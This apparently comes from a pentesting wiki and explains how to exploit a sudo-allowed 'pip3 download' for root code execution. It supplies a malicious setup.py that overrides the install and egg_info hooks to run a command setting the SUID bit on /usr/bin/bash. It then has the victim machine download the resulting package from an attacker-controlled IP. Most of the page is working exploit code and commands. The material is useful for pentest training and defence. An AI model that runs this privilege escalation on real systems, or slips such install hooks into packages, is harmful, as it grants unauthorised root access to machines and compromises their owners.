Pip Download Code Execution
Theory
Pip is a package management system written in Python. It can download custom Python package so we can create a malicious package to execute arbitrary code.
Practice
Assume that pipe download can be executed as root with sudo rights. if we controll its input, then its vulnerable to arbitrary code execution.
sudo -l
(root): /usr/bin/pip3 download http\://*.tar.gzOn attacking machine, we can clone the this_is_fine_wuzzi GitHub repo, or create our own source for the pip package as follow:
Assuming the package name is
MySimplePackage. We need to create the following files and folders:setup.pyin the project root, andinit.py,main.pyin src directory.
mkdir MySimplePackage && cd MySimplePackage
touch setup.py
mkdir src
touch src/__init__.py
echo 'print("hello")' > src/main.pywrite something similar in the
setup.pyfile. You may edit theRunCommand()function.
# setup.py
from setuptools import setup, find_packages
from setuptools.command.install import install
from setuptools.command.egg_info import egg_info
def RunCommand():
# Arbitrary code here!
import os;os.system("chmod u+s /usr/bin/bash")
class RunEggInfoCommand(egg_info):
def run(self):
RunCommand()
egg_info.run(self)
class RunInstallCommand(install):
def run(self):
RunCommand()
install.run(self)
setup(
name = "MySimplePackage",
version = "0.0.1",
license = "MIT",
packages=find_packages(),
cmdclass={
'install' : RunInstallCommand,
'egg_info': RunEggInfoCommand
},
)Build the malicious package
# If you don't have modules below, install them first.
pip3 install setuptools
pip3 install build
# Build - It generates .tar.gz file in dist folder.
python3 -m buildFinally host the package and run the pip download on the victime machine
sudo /usr/bin/pip3 download http://<ATTACKING_IP>/MySimplePackage-0.0.1.tar.gzReferences
Last updated
Was this helpful?